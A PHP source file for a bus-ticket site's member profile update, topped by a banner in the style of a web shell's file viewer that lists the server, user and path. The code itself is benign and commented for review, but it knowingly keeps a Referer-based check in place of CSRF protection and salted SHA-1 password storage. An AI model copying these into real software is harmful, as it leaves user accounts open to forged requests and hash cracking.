Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/process/


Current File : /tkt_travelbus/www/process/modify_member_info.php
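<?php
	/*
	 * Member self-service profile update (e-mail, password, name, phone, SMS opt-in).
	 *
	 * Flow: require a logged-in session, require the request to come from the
	 * info-change page, re-verify the current password, then apply each
	 * submitted field as its own UPDATE on TB_MEMBER.
	 *
	 * Every value that reaches SQL is bound as a parameter. The original built
	 * the statements by string interpolation, and FILTER_VALIDATE_EMAIL alone
	 * does not make a value safe to place inside a quoted SQL literal (a valid
	 * address may contain a single quote).
	 *
	 * Assumes $db_connect is a mysqli connection and that $pw_salt_value and
	 * _e() come from the included files - TODO confirm.
	 */
	include $_SERVER['DOCUMENT_ROOT'].'/include/base.php';
	include $_SERVER['DOCUMENT_ROOT'].'/process/process_common.php';

	$tb_name = "TB_MEMBER";

	// Read a POST field as a trimmed string; missing or array-valued fields become ''.
	$post_string = function ($key) {
		return (isset($_POST[$key]) && is_string($_POST[$key])) ? trim($_POST[$key]) : '';
	};

	// Encode text as a JavaScript string literal that is safe inside a <script> block.
	$js_string = function ($text) {
		$encoded = json_encode((string) $text, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
		return ($encoded === false) ? '""' : $encoded;
	};

	$member_id = isset($_SESSION['web_member']['mb_id']) ? $_SESSION['web_member']['mb_id'] : '';

	if (!$member_id) {
		$errMsg = _e("로그인해주세요.");
		echo "<script>alert(" . $js_string($errMsg) . ");location.href='/page/login.html';</script>";
		exit;
	}

	// NOTE(review): the Referer header is supplied by the client and this is a
	// substring match, so it is not CSRF protection. A per-session token checked
	// here (and emitted by the info-change form) is the proper control; that
	// needs a change outside this file.
	$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
	if (strpos($referer, "/page/info-change.html") === false) {
		// Invalid access
		echo 'failed access';
		exit;
	}

	// Run "UPDATE <table> SET <column> = ? WHERE mb_id = ?" for the current member.
	// $column is always a literal from this file, never request data.
	$update_member_column = function ($column, $value) use ($db_connect, $tb_name, $member_id) {
		$stmt = $db_connect->prepare("UPDATE {$tb_name} SET {$column} = ? WHERE mb_id = ?");
		if (!$stmt) {
			error_log("modify_member_info: could not prepare update of {$column}");
			return false;
		}
		$value = (string) $value;
		$id = (string) $member_id;
		$stmt->bind_param('ss', $value, $id);
		$ok = $stmt->execute();
		$stmt->close();
		return $ok;
	};

	// Check that the submitted current password matches the stored one.
	// NOTE(review): salted SHA-1 is a fast hash and unsuitable for password
	// storage. Moving to password_hash()/password_verify() needs a coordinated
	// change with the login and registration code, so the stored format is kept here.
	$member_password_hash = sha1($pw_salt_value.$post_string('member_password'));

	$password_matches = false;
	$stmt = $db_connect->prepare("SELECT count(*) AS cnt FROM {$tb_name} WHERE mb_id = ? AND mb_pwd = ?");
	if ($stmt) {
		$id = (string) $member_id;
		$stmt->bind_param('ss', $id, $member_password_hash);
		if ($stmt->execute()) {
			$stmt->bind_result($cnt);
			if ($stmt->fetch()) {
				$password_matches = ((int) $cnt === 1);
			}
		}
		$stmt->close();
	}

	// Fail closed: a query error is treated the same as a wrong password.
	if (!$password_matches) {
		$errMsg = _e("기존 비밀번호가 일치하지 않습니다.");
		echo "<script>alert(" . $js_string($errMsg) . ");location.href='/page/info-change.html';</script>";
		exit;
	}

	// E-mail: only stored when it passes validation.
	$member_email = $post_string('member_email');
	if ($member_email !== '' && filter_var($member_email, FILTER_VALIDATE_EMAIL)) {
		$update_member_column('mb_email', $member_email);
	}

	// New password: both fields must be filled in and identical. Strict
	// comparison, because == treats numeric-looking strings such as "1e3"
	// and "1000" as equal.
	$member_new_password = $post_string('member_new_password');
	$member_new_password_confirm = $post_string('member_new_password_confirm');
	if ($member_new_password !== '' && $member_new_password_confirm !== ''
		&& $member_new_password === $member_new_password_confirm) {
		$update_member_column('mb_pwd', sha1($pw_salt_value.$member_new_password));
	}

	// Name
	$member_name = $post_string('member_name');
	if ($member_name !== '') {
		$update_member_column('mb_nm', $member_name);
	}

	// Phone number: stored without hyphens. The original trimmed the value and
	// then overwrote it with the untrimmed POST field; the trimmed one is used here.
	$member_tel_number = str_replace("-", "", $post_string('member_tel_number'));
	if ($member_tel_number !== '') {
		$update_member_column('mb_phone', $member_tel_number);
	}

	// SMS opt-in is always written: 'Y' when the checkbox was sent, otherwise 'N'.
	$is_member_sms = ($post_string('member_sms') === 'on') ? "Y" : "N";
	$update_member_column('mb_sms_yn', $is_member_sms);

	$errMsg = _e("회원정보 변경이 완료되었습니다.");
	echo "<script>alert(" . $js_string($errMsg) . ");location.href='/'</script>";
	exit;
?>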
